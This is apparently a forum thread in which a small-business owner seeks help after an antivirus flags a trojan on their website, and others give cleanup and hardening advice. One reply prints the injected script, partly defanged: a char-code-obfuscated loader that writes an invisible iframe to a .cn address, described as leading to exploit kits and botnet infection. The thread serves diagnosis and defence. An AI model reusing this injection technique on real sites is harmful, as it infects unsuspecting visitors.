my own website (that I built) suddenly has trojan horse - help!

[eden99]

Someone alerted me today that when they visited my website (a simple site I built in Dreamweaver and have used problem-free for the last couple of years, http://www.sierra-dogs.com ) they were told that there was malware or a trojan horse.  I went to the website (I use Firefox as a browser) and Avast alerted me that it found a sample of the trojan horse HTML:IFrame-GZ [Trj]  The only option given to me in the Avast warning dialog box is "abort connection."

So, I have a few questions.  How do I get more info about what Avast has detected?  Also, I noticed on another thread some suggestions to clean your computer, and I will try those.  But how should I make sure that not just my computer, but my website (hosted through Lunarpages.com -- I upload everything through FTP) is cleaned as well???  I am losing potential customers!  How do I protect the web pages in the future?  Did it get infected from my files, or is someone able to get the malware on my site some other way?

Thank you in advance for any suggestions/answers.

[polonus]

Hi eden99,

Yes there is a big chunk of obfuscated probably SQLrow malcode there that avast apparently flags:

Code: [Select]

EDITED and SHORTED script type="text/j*v*script"var qhEHJJekBOuKGRbXCPKz = ^..........."ewLOJ60ewLOJ105ewLOJ102ewLOJ114ewLOJ97ewLOJ109ewLOJ101ewLOJ32ewLOJ119ewLOJ105ewLOJ100ewLOJ116ewLOJ104ewLOJ61ewLOJ34ewLOJ52ewLOJ56ewLOJ48ewLOJ34ewLOJ32ewLOJ104ewLOJ101ewLOJ105ewLOJ103ewLOJ104ewLOJ116ewLOJ61ewLOJ34ewLOJ54ewLOJ48ewLOJ34ewLOJ32ewLOJ115ewLOJ114ewLOJ99ewLOJ61ewLOJ34ewLOJ104ew.........LOJ116ewLOJ116ewLOJ112ewLOJ58ewLOJ47ewLOJ47ewLOJ104ewLOJ105ewLOJ116ewLOJ45ewLOJ115ewLOJ101ewLOJ110ewLOJ100ewLOJ101ewLOJ114ewLOJ115ewLOJ46ewLOJ99ewLOJ110ewLOJ47ewLOJ102ewLOJ105ewLOJ110ewLOJ100ewLOJ47ewLOJ105ewLOJ110ewLOJ46ewLOJ99ewLOJ103ewLOJ105ewLOJ63ewLOJ55ewLOJ34ewLOJ32ewLOJ115ewLOJ116ewLOJ121ewLOJ108ewLOJ101ewLOJ61ewLOJ34ewLOJ98ewLOJ111ewLOJ114ewLOJ100ewLOJ101ewLOJ114ewLOJ58ewLOJ48ewLOJ112ewLOJ120ewLOJ59ewLOJ32ewLOJ112ewLOJ111ewLOJ115ewLOJ105ewLOJ116ewLOJ105ewLOJ111ewLOJ110ewLOJ58ewLOJ114ewLOJ101ewLOJ108ewLOJ97ewLOJ116ewLOJ105ewLOJ118ewLOJ101ewLOJ59ewLOJ32ewLOJ116ewLOJ111ewLOJ112ewLOJ58ewLOJ48ewLOJ112ewLOJ120ewLOJ59ewLOJ32ewLOJ108ewLOJ101ewLOJ102ewLOJ116ewLOJ58ewLOJ45ewLOJ53ewLOJ48e............wLOJ48ewLOJ112ewLOJ120ewLOJ59ewLOJ32ewLOJ111ewLOJ112ewLOJ97ewLOJ99ewLOJ105ewLOJ116ewLOJ121ewLOJ58ewLOJ48ewLOJ59ewLOJ32ewLOJ102ewLOJ105ewLOJ108ewLOJ116ewLOJ101ewLOJ114ewLOJ58ewLOJ112ewLOJ114ewLOJ111ewLOJ103ewLOJ105ewLOJ100ewLOJ58ewLOJ68ewLOJ88ewLOJ73ewLOJ109ewLOJ97ewLOJ103ewLOJ101ewLOJ84ewLOJ114ewLOJ97ewLOJ110ewLOJ115ewLOJ102ewLOJ111ewLOJ114ewLOJ109ewLOJ46ewLOJ77ewLOJ105ewLOJ99ewLOJ114ewLOJ111ewLOJ115ewLOJ111ewLOJ102ewLOJ116ewLOJ46ewLOJ65ewLOJ108ewLOJ112ewLOJ104ewLOJ97ewLOJ40ewLOJ111ewLOJ112ewLOJ97ewLOJ99ewLOJ105ewLOJ116ewLOJ121ewLOJ61ewLOJ48ewLOJ41ewLOJ59ewLOJ32ewLOJ45ewLOJ109ewLOJ111ewLOJ122ewLOJ45ewLOJ111ewLOJ112ewLOJ97ewLOJ99ewLOJ105ewLOJ116ewLOJ121ewLOJ58ewLOJ48ewLOJ34ewLOJ62ewLOJ60ewLOJ47ewLOJ105ewLOJ102ewLOJ114ewLOJ97ewLOJ109ewLOJ101ewLOJ62";var wqfYyLudgHIXoMexWJhX !! qhEHJJekBOuKGRbXCPKz.split("ewLOJ");var XbidtJBvZLvVCbuBmoeS = "";for (v*r wnqkAUhXdPuBrdekmggM=1; wnqkAUhXdPuBrdekmggM<wqfYyLudgHIXoMexWJhX.length; wnqkAUhXdPuBrdekmggM++){XbidtJBvZLvVCbuBmoeS+=String.fromCharCode(wqfYyLudgHIXoMexWJhX[wnqkAUhXdPuBrdekmggM]);}var VyodIJUOXMuOEyNuLfLF = ""+XbidtJBvZLvVCbuBmoeS+"";document.wr&te(""+VyodIJUOXMuOEyNuLfLF+"")^script^Update and patch the software you use, change your log-in password for a stronger one, but it can also be the server software at the hosting firm that has vulnerabilities that were explored. Contact them and give them the link to this posting. It is a common thing that reputable reliable websites that have no strong protection are being hacked by cybercriminals,

polonus

[eden99]

Thank you, Polonus!  I've opened a help ticket with my hosting company, and will hopefully get this resolved soon. 

[DavidR]

Thank you, Polonus!  I've opened a help ticket with my hosting company, and will hopefully get this resolved soon. 

Don't hold your breath, some are woefully slow, hopefully your Host will step up.

This is commonly down to old content management software being vulnerable, see this example of a HOSTs response to a hacked site.

We have patched up the server and we found a weakness in PHP which was helping aid the compromise of some domains.  We updated it, and changed some default settings to help prevent these coding compromises. The weaknesses were not server wide but rather just made it easier on a hacker to compromise individual end user accounts.

I suggest the following clean up procedure for both your accounts:

1. check all index pages for any signs of java script injected into their coding. On windows servers check any "default.aspx" or
"default.cfm" pages as those are popular targets too.

2. Remove any "rouge" files or php scripts uploaded by the hackers into your account. Such scripts allowed them to make account wide
changes, spam through your account, or spread their own .htaccess files through all of your domains in that end user.

3. Check all .htaccess files, as hackers like to load re-directs into them.

4. Change all passwords for that end user account. The cp password, the ftp password, and any ftp sub accounts. Make sure to use a
"strong" password which includes upper case, lower case, numbers and NO COMPLETE WORDS OR NAMES!

This coupled with our server side changes should prevent any resurfacing of the hackers efforts. In some cases you may still have coding which allows for injection. All user input fields hidden or not should be hard coded, filtered, and sanitized before being handed off to php or a database which will prevent coding characters from being submitted and run through your software.

Also see, Tips for Cleaning & Securing Your Website, http://www.stopbadware.org/home/security.

[polonus]

Hi eden99 and DavidR,

It's an obfuscated malicious script, in an invisible iframe, that redirect to a .cn site with a frame containing a porn site. This porn site has a javascript that redirect to a web server containing various exploits for adobe pdf reader, and flash player.
If the exploit is successful, your machine will become a zombie PC of the Waledac botnet.
Information on this malcode courtesy of 10mik33mik (malcode expert)
Removal instructions for this Waledac.cn trojan: http://forums.spybot.info/showthread.php?t=46822
Latest on another variant the Waledac worm: http://garwarner.blogspot.com/2009/04/waledac-moving-on-to-canadian-pharmacy.html

polonus

[grahambell]

Had a similar problem with a simple web site of my own some years back. Alerted my hosting company and they advised me to re-ftp the original files from my computer, which at least got rid of the virus on the site, so worth trying that ASAP.

[DavidR]

Some years ago this type of thing (not this complex) wasn't around and simply uploading new clean pages will last a very short time some are even reinfected in the ftp process.

Now as my quote from another Host shows the lengths you have to go to now.